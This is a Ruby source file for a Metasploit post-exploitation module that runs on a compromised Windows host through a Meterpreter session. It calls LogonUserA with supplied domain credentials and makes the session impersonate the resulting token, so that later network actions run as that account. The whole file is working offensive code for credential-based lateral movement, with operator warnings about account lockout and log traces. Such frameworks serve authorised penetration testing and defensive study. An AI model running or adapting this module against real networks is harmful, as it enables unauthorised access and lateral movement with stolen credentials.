##
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
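class MetasploitModule < Msf::Post
  # The only logon type that does not authenticate the supplied credentials on the
  # target: Windows accepts any password and uses it for outbound (network) auth
  # only. Every other LOGONTYPE value performs a real logon on the host, so a wrong
  # password is a failed logon there.
  NO_LOCAL_VALIDATION_LOGON = 'LOGON32_LOGON_NEW_CREDENTIALS'.freeze

  # Module metadata and options. DOMAIN/USERNAME/PASSWORD are required; LOGONTYPE
  # is an advanced option defaulting to LOGON32_LOGON_NEW_CREDENTIALS.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Make Token Command',
        'Description' => %q{
          In its default configuration, this module creates a new network security context with the specified
          logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and
          a new logon session is created and linked to that token. The token is then impersonated to acquire
          the new network security context. This module has no effect on local actions - only on remote ones
          (where the specified credential material will be used). With the default LOGONTYPE
          (LOGON32_LOGON_NEW_CREDENTIALS) this module does not validate the credentials specified; any other
          LOGONTYPE authenticates them on the target, so a wrong password is a failed logon there.
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'AKA' => ['make_token', 'maketoken'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A new logon session is created on the target (see Description), which
          # is what leaves traces in the host's logs.
          'SideEffects' => [IOC_IN_LOGS]
        },
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Author' => [
          'Daniel López Jiménez (attl4s)',
          'Simone Salucci (saim1z)'
        ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_config_revert_to_self
              stdapi_sys_config_update_token
            ]
          }
        }
      )
    )
    register_options(
      [
        OptString.new('DOMAIN', [true, 'Domain to use' ]),
        OptString.new('USERNAME', [true, 'Username to use' ]),
        OptString.new('PASSWORD', [true, 'Password to use' ])
      ]
    )
    register_advanced_options(
      [
        OptEnum.new('LOGONTYPE', [true, 'The type of logon operation to perform. Using LOGON32_LOGON_INTERACTIVE may cause issues within the session (typically due to the token filtering done by the UserAccountControl mechanism in Windows). Use with caution', 'LOGON32_LOGON_NEW_CREDENTIALS', ['LOGON32_LOGON_BATCH', 'LOGON32_LOGON_INTERACTIVE', 'LOGON32_LOGON_NETWORK', 'LOGON32_LOGON_NETWORK_CLEARTEXT', 'LOGON32_LOGON_NEW_CREDENTIALS', 'LOGON32_LOGON_SERVICE', 'LOGON32_LOGON_UNLOCK']]),
      ]
    )
  end

  # Reverts any current impersonation, calls LogonUserA with the configured
  # credentials and logon type, and hands the resulting token to the Meterpreter
  # server so it impersonates the new context. Prints an error and returns if
  # LogonUserA fails; fails with BadConfig on a non-Meterpreter session.
  def run
    # Make sure we meet the requirements before running the script
    fail_with(Failure::BadConfig, 'This module requires a Meterpreter session') unless session.type == 'meterpreter'

    user = datastore['USERNAME']
    password = datastore['PASSWORD']
    domain = datastore['DOMAIN']
    logontype = datastore['LOGONTYPE']

    # Warn up front: with any type other than the default, LogonUser performs a real
    # authentication on the target, so a bad password is a failed logon on the host
    # and may count toward account lockout where such a policy applies. Emitted
    # before the call so the operator sees it even if the call itself fails.
    unless logontype == NO_LOCAL_VALIDATION_LOGON
      print_warning("#{logontype} authenticates #{domain}\\#{user} on the target; a wrong password is a failed logon there and may count toward account lockout")
    end

    # Drop any existing impersonation first. This happens before LogonUser, so if
    # the call below fails the session is left in its original, non-impersonated
    # context rather than the previous one.
    print_status('Executing rev2self to revert any previous token impersonations')
    session.sys.config.revert_to_self

    # Create the new logon session / token pair. The trailing 4 appears to be the
    # buffer size railgun reserves for the phToken out-parameter.
    # NOTE(review): LogonUserA takes ANSI strings, so non-ASCII usernames or
    # passwords may not round-trip; the W variant would be needed for those — unverified here.
    print_status("Executing LogonUserA with the flag #{logontype} to create a new security context for #{domain}\\#{user}")
    logon_user = session.railgun.advapi32.LogonUserA(user, domain, password, logontype, 'LOGON32_PROVIDER_DEFAULT', 4)

    unless logon_user['return']
      print_error("LogonUserA call failed, Error Code: #{logon_user['GetLastError']} - #{logon_user['ErrorMessage']}")
      return
    end

    ph_token = logon_user['phToken']
    print_status('Impersonating the new security context...')
    # Store the token within the server, which then impersonates it for subsequent actions
    session.sys.config.update_token(ph_token)
    print_good('The session should now run with the new security context!')

    # With NEW_CREDENTIALS nothing changes locally; remind the operator so an
    # unchanged getuid is not mistaken for a failure.
    return unless logontype == NO_LOCAL_VALIDATION_LOGON

    print_warning('Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)')
  end
end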